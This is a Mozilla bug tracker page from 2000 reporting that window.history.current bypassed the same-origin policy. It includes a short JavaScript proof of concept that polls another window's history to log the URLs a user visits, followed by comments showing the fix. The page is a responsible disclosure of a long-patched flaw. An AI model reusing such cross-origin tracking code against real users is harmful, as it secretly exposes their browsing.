Closed
Bug 37905
Opened 24 years ago
Closed 24 years ago
window.history.current allows tracking user's browsing
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M16
People
(Reporter: norrisboyd, Assigned: security-bugs)
Details
(Whiteboard: [nsbeta2+])
Attachments
(1 file)
749 bytes,
text/html
|
Details |
Subject: BUG: window.history.current allows tracking user's browsing Date: Tue, 02 May 2000 15:45:02 +0300 From: Georgi Guninski <joro@nat.bg> To: Norris Boyd <norris@netscape.com> window.history.current is not protected by Same Origin security policy and that allows tracking user's surfing. The code is: -------------------------------------------------------------- <FORM> <TEXTAREA WRAP=HARD NAME=comment ROWS=10 COLS=80></TEXTAREA> </FORM> <SCRIPT> last=""; current=""; a=window.open("http://www.yahoo.com"); function checkStatus() { current=a.history.current; if (current != "" && current != last) { last = current; document.forms[0].elements[0].value += current + " "; } } setInterval("checkStatus()",500); </SCRIPT> -------------------------------------------------------------- Reading links using window.history.current window.history.current is not protected by Same Origin security policy and that allows tracking user's surfing. Follow some links in www.yahoo.com and see them in the TEXTAREA bellow.
Reporter | ||
Comment 1•24 years ago
|
||
Assignee | ||
Comment 2•24 years ago
|
||
Need to double-check call to same-origin, check default policy. I think I can take care of this one.
Assignee | ||
Updated•24 years ago
|
Target Milestone: --- → M16
Assignee | ||
Comment 6•24 years ago
|
||
Fixed...bug in nsScriptSecurityManager. Secure prefs access was failing.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
Assignee | ||
Comment 8•24 years ago
|
||
Opening fixed security bugs to the public.
Group: netscapeconfidential?
You need to log in
before you can comment on or make changes to this bug.
Description
•